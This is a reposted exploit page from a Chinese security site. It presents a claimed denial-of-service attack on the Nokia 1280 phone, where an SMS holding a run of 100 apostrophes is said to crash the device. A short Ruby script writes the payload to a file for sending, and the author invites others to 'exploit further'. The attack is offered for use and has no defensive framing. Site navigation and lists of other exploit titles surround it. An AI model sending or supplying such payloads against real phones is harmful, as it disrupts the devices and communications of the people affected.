首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nokia 1280 Denial Of Service
来源:unownsec@gmail.com 作者:Un0wn_X 发布时间:2013-07-04  
###########################################################################################################
#Exploit Title: Nokia 1280 DoS Vulnerability
#Author : Un0wn_X
#E-Mail : unownsec@gmail.com
#Date   : Monday, July 01,2013
#Product: http://www.nokia.com/in-en/phones/phone/nokia-1280/
###########################################################################################################

#Vulnerability Advisory
=======================
You can send a  SMS containing the malicious buffer and can crash the phone once it loads in the memory.

#Video PoC
============
http://www.youtube.com/watch?v=csLuNZ0mjpI

#Exploit
=========

#!/usr/bin/env ruby
#Author: Un0wn_X

begin
buff = "Don't Scroll Down :D \n\n"
buff += "'"*100

file = open("exploit.txt","w")
file.write(buff)
file.close()

puts "[+] Exploit created >> exploit.txt"
puts "[*] Now send the text contained inside the exploit.txt by a sms"
puts "[~] Un0wn_X"
end

#Final Notes
=============
I have no idea to attach this to a debugger and fuzz this system. You may exploit further





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Realtek Sound Manager AvRack (
·Opera 12.15 Denial Of Service
·ABBS Audio Media Player .LST B
·InstantCMS 1.6 Remote PHP Code
·FileCOPA 7.01 Denial Of Servic
·Adobe Reader X 10.1.4.38 - BMP
·WinAmp 5.63 - Stack-based Buff
·OpenNetAdmin 13.03.01 Remote C
·WinAmp 5.63 - Invalid Pointer
·AOL Instant Messenger 8.0.1.5
·Windows EPATHOBJ::pprFlattenRe
·Google Chrome 25.0.1364.152 HT
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved